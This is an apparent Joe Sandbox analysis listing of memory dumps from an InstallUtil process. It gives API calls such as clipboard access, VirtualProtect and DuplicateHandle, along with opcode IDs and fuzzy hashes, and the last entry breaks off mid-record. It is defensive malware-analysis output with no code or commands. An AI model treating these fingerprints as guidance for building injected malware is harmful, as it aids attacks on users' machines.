                                                                                                                          • API String ID: 0-538443824
                                                                                                                          • Opcode ID: 9de3a5204cb1348b8b3742640ac3255314b91afc961b1f92001246a4869472a5
                                                                                                                          • Instruction ID: d3a67b61fbb20709b0cd38012f3f10db85387d329df463c2e42b9b84744fa089
                                                                                                                          • Opcode Fuzzy Hash: 9de3a5204cb1348b8b3742640ac3255314b91afc961b1f92001246a4869472a5
                                                                                                                          • Instruction Fuzzy Hash: 87227B35B002449FDB08DFAAC494A6DBBF2EF88310F148469E905AB3A2DB35FD45CB50
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2083260376.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_5790000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Clipboard
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 220874293-0
                                                                                                                          • Opcode ID: cd369ecdcac03e76dec7e24167da846b31623f659c2d477cb7630d3d1796fa03
                                                                                                                          • Instruction ID: 69b863aae8a25fa56470363ca86c177fb2e5e2a58520b406ba934a0f1c061e21
                                                                                                                          • Opcode Fuzzy Hash: cd369ecdcac03e76dec7e24167da846b31623f659c2d477cb7630d3d1796fa03
                                                                                                                          • Instruction Fuzzy Hash: 703132B0D00208EFDF14CFA9D984BDDBBF1AF08314F248029E409AB294DBB4A945CF65
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2083260376.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_5790000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Clipboard
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 220874293-0
                                                                                                                          • Opcode ID: 6cabfdccb078a0ad63e2aa15a53d5da5440596bbd6b85dd294556e889313e98c
                                                                                                                          • Instruction ID: aee3fea82e9e649b2977b1e228683471c25baaecf047022c55e7b09a92ffb38a
                                                                                                                          • Opcode Fuzzy Hash: 6cabfdccb078a0ad63e2aa15a53d5da5440596bbd6b85dd294556e889313e98c
                                                                                                                          • Instruction Fuzzy Hash: 7B3122B0D01208DFDB14CFA9D984BCEBBF5AF48304F248029E405BB294DB74A985CF65
                                                                                                                          APIs
                                                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 050DA48F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2078547065.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_50d0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FromMonitorPoint
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1566494148-0
                                                                                                                          • Opcode ID: efbe569a0507ba2b6ea3afcd8e612f4cc0e51fbdc798c2a47e2d1742d9055ced
                                                                                                                          • Instruction ID: 7f7422ddec64c22e901b4dfd2bae71e3e94f2870c65cc07b940363482f8c4be2
                                                                                                                          • Opcode Fuzzy Hash: efbe569a0507ba2b6ea3afcd8e612f4cc0e51fbdc798c2a47e2d1742d9055ced
                                                                                                                          • Instruction Fuzzy Hash: FF219AB0A043589FCB10DF99D449BAEBFF0EB89324F10841AE855AB281C7349944CFA5
                                                                                                                          APIs
                                                                                                                          • DuplicateHandle.KERNELBASE(00000000,00000000,0572797C,?,00000000,050D9C4C,00000000,?,?,?,?), ref: 057962EF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2083260376.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_5790000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DuplicateHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3793708945-0
                                                                                                                          • Opcode ID: e9d8ba12b21a17202de807f9c6d7b863e70cc37825455de1c7c83b8457002631
                                                                                                                          • Instruction ID: 883407bc1fd31b56b0c5a5e3d234e2ce1c1ce228a32c508b22629b8c69409270
                                                                                                                          • Opcode Fuzzy Hash: e9d8ba12b21a17202de807f9c6d7b863e70cc37825455de1c7c83b8457002631
                                                                                                                          • Instruction Fuzzy Hash: 1121E5B59002589FDB10CF99D584ADEFBF5FB48320F14842AE954A3350D374A944DFA5
                                                                                                                          APIs
                                                                                                                          • DuplicateHandle.KERNELBASE(00000000,00000000,0572797C,?,00000000,050D9C4C,00000000,?,?,?,?), ref: 057962EF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2083260376.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_5790000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DuplicateHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3793708945-0
                                                                                                                          • Opcode ID: 4e3daf1672b44888d756818ff23a9a1a9df242207db7bb2bde581450f9f78091
                                                                                                                          • Instruction ID: 4add2f0ea42596ea66d2e8298e8f5765d05d326a3227e6b28e36bf50490587e4
                                                                                                                          • Opcode Fuzzy Hash: 4e3daf1672b44888d756818ff23a9a1a9df242207db7bb2bde581450f9f78091
                                                                                                                          • Instruction Fuzzy Hash: 6721E4B59002589FDB10CF9AD584ADEFBF4FB48320F14842AE958A7310D378A944CFA5
                                                                                                                          APIs
                                                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 050DA48F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2078547065.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_50d0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FromMonitorPoint
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1566494148-0
                                                                                                                          • Opcode ID: 9ac15c6c7567a3bb7388ba3168781b75356d272b10f92fab18990ea0c61e3f8d
                                                                                                                          • Instruction ID: 532ed81b41b1c575a798c77adabe7da146e07642be09bcdef49e4d4ea241d182
                                                                                                                          • Opcode Fuzzy Hash: 9ac15c6c7567a3bb7388ba3168781b75356d272b10f92fab18990ea0c61e3f8d
                                                                                                                          • Instruction Fuzzy Hash: 96216D74A003589FCB10DF9AD449BEEFBF5EB88320F10841AE855AB350CB75A944CFA1
                                                                                                                          APIs
                                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00999264
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2062868455.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_990000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 544645111-0
                                                                                                                          • Opcode ID: 97114fb9e0604551e4fe3f9870e60c87e60c7a86ed099b3e9d98ddf325dce848
                                                                                                                          • Instruction ID: 3e31a6f5d78f9a23fc8f327f24e66bf30b35fef02eba89453cc88c92e42929ca
                                                                                                                          • Opcode Fuzzy Hash: 97114fb9e0604551e4fe3f9870e60c87e60c7a86ed099b3e9d98ddf325dce848
                                                                                                                          • Instruction Fuzzy Hash: 9B11F4B19002499FDB20DFAAC484BDEFBF8EF48320F10842AD459A7250C775A944CFA5
                                                                                                                          APIs
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 057963DD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2083260376.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_5790000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Initialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2538663250-0
                                                                                                                          • Opcode ID: 491b73cefaf081412454b57d3b5e870e2cbdcf53839b9649bd7e2ef6ca65cd38
                                                                                                                          • Instruction ID: d92ba0cb36eb2b8059da9e6e8f26a05b60aa27615bd06cb296750fdd79c478a4
                                                                                                                          • Opcode Fuzzy Hash: 491b73cefaf081412454b57d3b5e870e2cbdcf53839b9649bd7e2ef6ca65cd38
                                                                                                                          • Instruction Fuzzy Hash: AD1115B19043588FDB20DF9AD489BDEBBF4EB48324F108569D559A7210C378A944CFA5
                                                                                                                          APIs
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 057963DD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2083260376.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_5790000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Initialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2538663250-0
                                                                                                                          • Opcode ID: c358590a89c6ae96642afd2f678ede12e88002c0ac5a3db6bf3607ba68bbc4a2
                                                                                                                          • Instruction ID: b7015969f8d5508f88032774e8bdabc1bf4a0497cf5beac75da08488d4d4bfaa
                                                                                                                          • Opcode Fuzzy Hash: c358590a89c6ae96642afd2f678ede12e88002c0ac5a3db6bf3607ba68bbc4a2
                                                                                                                          • Instruction Fuzzy Hash: BC1142B09002488FDF20DF9AD488BDEBBF4FB48320F208429D559A3210C378AA40CFA5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: a^q
                                                                                                                          • API String ID: 0-3411664965
                                                                                                                          • Opcode ID: 75d2c11c87708ee422678118571263199c375dd36d83b769df6f3463c063aefe
                                                                                                                          • Instruction ID: 0992a245f18893c1961f37fe83eafe547dd4025505ec0baeebaf36c8f180812d
                                                                                                                          • Opcode Fuzzy Hash: 75d2c11c87708ee422678118571263199c375dd36d83b769df6f3463c063aefe
                                                                                                                          • Instruction Fuzzy Hash: A3C1F434B00104CFD758DF65E844BAEB3B3FB84304F68C1A5D5056B698DB3AAE4ADB81
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Deq
                                                                                                                          • API String ID: 0-948982800
                                                                                                                          • Opcode ID: 64714f5b684c9ea730b0798d6cc57320c4f4b893d98623692fd26e8d9f44cd7e
                                                                                                                          • Instruction ID: c218704c44d9394fe8dfc286246e18468ab80d285a3f3d14e23985f7c081d4bf
                                                                                                                          • Opcode Fuzzy Hash: 64714f5b684c9ea730b0798d6cc57320c4f4b893d98623692fd26e8d9f44cd7e
                                                                                                                          • Instruction Fuzzy Hash: C4A1BE747402409FCB18EF69E594A5ABBF2BF89304F158569E805EB3B5DB31EC06CB90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'^q
                                                                                                                          • API String ID: 0-1614139903
                                                                                                                          • Opcode ID: 48fc878bad00f0435b2822482ad26930f37a5add218475165b04d76ffbb7eb9b
                                                                                                                          • Instruction ID: d753f55c04564f8146c867339f0c0a9de38677f9c56b416bfa83a103ec56368c
                                                                                                                          • Opcode Fuzzy Hash: 48fc878bad00f0435b2822482ad26930f37a5add218475165b04d76ffbb7eb9b
                                                                                                                          • Instruction Fuzzy Hash: 4DA1FC34A10218DFDB08EFA5D994AADB7B2FF88301F158159E805AB365DB34FD42DB50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Deq
                                                                                                                          • API String ID: 0-948982800
                                                                                                                          • Opcode ID: c2e15948eb5ed4b3cc3fa4b2d1e751e1266a0e8c010bcbff0aa9270a876fabe4
                                                                                                                          • Instruction ID: 62d5f867bd577d58d419393fef57a02f5a449b5fdd74cbbd0a11560e678c8f84
                                                                                                                          • Opcode Fuzzy Hash: c2e15948eb5ed4b3cc3fa4b2d1e751e1266a0e8c010bcbff0aa9270a876fabe4
                                                                                                                          • Instruction Fuzzy Hash: F3615C786006409FCB18DF69E584A59BBF2BF89314F158569E805AB375DB30FC46CF90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: pbq
                                                                                                                          • API String ID: 0-3896149868
                                                                                                                          • Opcode ID: de21f251ddbe0eb54836d2b2b1a41013d5a6afba60439d86af0540152d24ac96
                                                                                                                          • Instruction ID: 8e6f3f46005f21ed5a6d1efbd590159549d884d11f20d56e01537e5a5188ba64
                                                                                                                          • Opcode Fuzzy Hash: de21f251ddbe0eb54836d2b2b1a41013d5a6afba60439d86af0540152d24ac96
                                                                                                                          • Instruction Fuzzy Hash: D2514C76640104AFDB499FA8C904D197BB3FF8D314B1684D8E6098B276DA32DC22EB50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'^q
                                                                                                                          • API String ID: 0-1614139903
                                                                                                                          • Opcode ID: 0d2aecdb993f86d4d6ebe038c76ec87d7dd62e33719157c56dd39837a20c63dd
                                                                                                                          • Instruction ID: b5c44c3687b1cecc64aa13a4aa770d3ae24dbf663962372bde6f7b6ab8d371f6
                                                                                                                          • Opcode Fuzzy Hash: 0d2aecdb993f86d4d6ebe038c76ec87d7dd62e33719157c56dd39837a20c63dd
                                                                                                                          • Instruction Fuzzy Hash: F041A034B106148FDB08BB6AC894ABEB7B7EFC9704F104419D406AB3A4DF74AD46DB91
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (bq
                                                                                                                          • API String ID: 0-149360118
                                                                                                                          • Opcode ID: a2a3c51bfe70d16a5e28f1df0b71fd23457c9a6ab40dcde8beee18a3efd11c6e
                                                                                                                          • Instruction ID: 57057c17a10a4408f0a9383d656614a0e42856701cdd19f29983b69e75e3e5ce
                                                                                                                          • Opcode Fuzzy Hash: a2a3c51bfe70d16a5e28f1df0b71fd23457c9a6ab40dcde8beee18a3efd11c6e
                                                                                                                          • Instruction Fuzzy Hash: 7641D071A00516AFCB00DF59D48496EFBB1FF89324B158699D9699B391D730FC42CBC0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'^q
                                                                                                                          • API String ID: 0-1614139903
                                                                                                                          • Opcode ID: 8abf7e59f7203e332fba71ea3d8fb335d2d6eaa9c300fab4520ed4dae11c8f81
                                                                                                                          • Instruction ID: 6c0b46909eccd9e4af362f011f7becbca936e845c1de5dfaa96ba1c3bcb013ab
                                                                                                                          • Opcode Fuzzy Hash: 8abf7e59f7203e332fba71ea3d8fb335d2d6eaa9c300fab4520ed4dae11c8f81
                                                                                                                          • Instruction Fuzzy Hash: B0413B717406049FD308EB69C9A5B2AB7A7AFC8704F104469E20A8B3A5DF75EC42C790
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'^q
                                                                                                                          • API String ID: 0-1614139903
                                                                                                                          • Opcode ID: e696d317cdae3a71c4c1ba03220d0316f61c41276ebef92f99306e07fa657229
                                                                                                                          • Instruction ID: 77bfc4813959a1bdc6309ad909bd968fc298d12730d18d3871c8c34a123bc2cd
                                                                                                                          • Opcode Fuzzy Hash: e696d317cdae3a71c4c1ba03220d0316f61c41276ebef92f99306e07fa657229
                                                                                                                          • Instruction Fuzzy Hash: 1D313C317406149FD308EB69C9A4B2AB7EBAFC8704F104568E20A8B3A5DF75FC42C790
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'^q
                                                                                                                          • API String ID: 0-1614139903
                                                                                                                          • Opcode ID: 6c8b271bc909d29f1af086e8af31d6de54b5fbf7432b65961d754cd3f251e55c
                                                                                                                          • Instruction ID: 6043b7e960a0c12b959f159f689f42cf567ae30a30593756b67a9a8189aab64b
                                                                                                                          • Opcode Fuzzy Hash: 6c8b271bc909d29f1af086e8af31d6de54b5fbf7432b65961d754cd3f251e55c
                                                                                                                          • Instruction Fuzzy Hash: 70319176B001059FDF098F65C954969BBB3FF8C310B0540A9EA0AAB365DB35EC46CBA0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: p<^q
                                                                                                                          • API String ID: 0-1680888324
                                                                                                                          • Opcode ID: b0101b4bb7e7aab61babd1cd394f5e4f510c8df6b608f65d2e4d8b4d5fe58d90
                                                                                                                          • Instruction ID: 659401a892efc0051ec330841410f8d15b6caf99785cb00b62d7d85ce1878c66
                                                                                                                          • Opcode Fuzzy Hash: b0101b4bb7e7aab61babd1cd394f5e4f510c8df6b608f65d2e4d8b4d5fe58d90
                                                                                                                          • Instruction Fuzzy Hash: 892125713001559FCB168F6AC844BBA7BEABF8A310B094496F844CB361DB35ED51DB60
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: p<^q
                                                                                                                          • API String ID: 0-1680888324
                                                                                                                          • Opcode ID: 9e8d5e85dcd3ba5dead591c48ce1efdea033be29b488346208021161267b6fd9
                                                                                                                          • Instruction ID: d9142ecae31f5935db74625e246970e2c95b12ab2d6a14c1a27a6ec9a0476245
                                                                                                                          • Opcode Fuzzy Hash: 9e8d5e85dcd3ba5dead591c48ce1efdea033be29b488346208021161267b6fd9
                                                                                                                          • Instruction Fuzzy Hash: 9C2135713002559FCB15CF6AC884AAA7BEAFF89310B0544A6F904CB361DB35ED51CB60
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: a^q
                                                                                                                          • API String ID: 0-3411664965
                                                                                                                          • Opcode ID: 3c4898dd31666b0e7b2cb9abf1f09385164303004c5d352fa245517654b65929
                                                                                                                          • Instruction ID: 5d468b7f080667a34046eb85ff1188b5e7f94fce3c6168e3d94a6ffd84df3389
                                                                                                                          • Opcode Fuzzy Hash: 3c4898dd31666b0e7b2cb9abf1f09385164303004c5d352fa245517654b65929
                                                                                                                          • Instruction Fuzzy Hash: 8321F970A005098FC719EBA9D9547AE77B7FF80704F148529D0466B2D4EF38AE0AC756
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2074829583.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4bb0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'^q
                                                                                                                          • API String ID: 0-1614139903
                                                                                                                          • Opcode ID: 78ad3744011eb46c29ba89e3e8455ac02ab53f9adb985f85f602fb268ca15952
                                                                                                                          • Instruction ID: 40a3764db238d6f241e14827ad8e216fec65b3c7fe7764656712cbf44543a747
                                                                                                                          • Opcode Fuzzy Hash: 78ad3744011eb46c29ba89e3e8455ac02ab53f9adb985f85f602fb268ca15952
                                                                                                                          • Instruction Fuzzy Hash: E911D332E09214CFCB265A6498242FE7B71EB86351F0A04DAD841AF391DB747C45DB91
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2062868455.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_990000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2962429428-0
                                                                                                                          • Opcode ID: 629806973c1919b93c4b72f0dac5894db35c9d525bc52720dae7e5988563ba37
                                                                                                                          • Instruction ID: d0f260752fd33d76a21a931c9d8ec202de7d9d4f4b5ed6805f5bc1da0a9f3fca
                                                                                                                          • Opcode Fuzzy Hash: 629806973c1919b93c4b72f0dac5894db35c9d525bc52720dae7e5988563ba37
                                                                                                                          • Instruction Fuzzy Hash: 80113AB19003588FDB20DFAEC4457EEFBF4EB88324F208429D459A7250CB75A945CFA5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2074829583.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4bb0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 65fd265f5bb1125b72e2d838a2fcb809d898149a213a5c621d31c61907c18f05
                                                                                                                          • Instruction ID: ca44a05673e987edf75d3a0fd210f5dceb32d637ebd87790fa88463c0c967203
                                                                                                                          • Opcode Fuzzy Hash: 65fd265f5bb1125b72e2d838a2fcb809d898149a213a5c621d31c61907c18f05
                                                                                                                          • Instruction Fuzzy Hash: 91023C30B0121ACBEF249F60C854BFEB772EF84304F5045E9C945A7294EBB5AD45DB92
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8f0d1e50be0cf4f4046a9960b3c36adf3f5f9e2df6c38e662268172ba2371f00
                                                                                                                          • Instruction ID: 27416c543bc0bcdb416a089edacc217f9107af1590188087ca9c1f95a43f83c3
                                                                                                                          • Opcode Fuzzy Hash: 8f0d1e50be0cf4f4046a9960b3c36adf3f5f9e2df6c38e662268172ba2371f00
                                                                                                                          • Instruction Fuzzy Hash: 80121A34A002198FDB14EF69C894AADB7B2FF89304F5085A8D549AB365DF30ED86DF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2074829583.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4bb0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9d725947ddd043f3245d64e6ae973422e6584b16fd856c113c472d0f6d66c799
                                                                                                                          • Instruction ID: 7369ab36d6c50ee86768e97f646c3c1b7ff43faa10873a09761b54ddfe9dcdd3
                                                                                                                          • Opcode Fuzzy Hash: 9d725947ddd043f3245d64e6ae973422e6584b16fd856c113c472d0f6d66c799
                                                                                                                          • Instruction Fuzzy Hash: ECC1B32070030157F71866AE88A077BD6DB9FE4708F10597E6302973A9EEE5FC1912E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2074829583.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4bb0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3ef2ed0dfecf2a34fe718949f488fefe2a7b3d91f360892c34ee662ce68958e0
                                                                                                                          • Instruction ID: 7b118af789631e125a48fed3950671234cf29a7adcb505cb3857a556554c9a58
                                                                                                                          • Opcode Fuzzy Hash: 3ef2ed0dfecf2a34fe718949f488fefe2a7b3d91f360892c34ee662ce68958e0
                                                                                                                          • Instruction Fuzzy Hash: 1DD155317141024BEB085BDAC89867BBAEBEFD4704F5044BEA646C7298DEE5EC0587E1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2074829583.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4bb0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 99516fa74a81eae130ace42abd5f0f9b20401b8adc520f9518f4ed5846acd9f5
                                                                                                                          • Instruction ID: c6efaadbf231a8e80efe85494af23ebb51d70d53d32557dc5b6fa7d5701a1f41
                                                                                                                          • Opcode Fuzzy Hash: 99516fa74a81eae130ace42abd5f0f9b20401b8adc520f9518f4ed5846acd9f5
                                                                                                                          • Instruction Fuzzy Hash: 04A1DB3070024247EB09AAAA98E467FB6ABDFE4704F14457D9B42CB394DFECED0652C5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2074829583.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4bb0000_InstallUtil.jbxd
                                                                                                                          Similarity
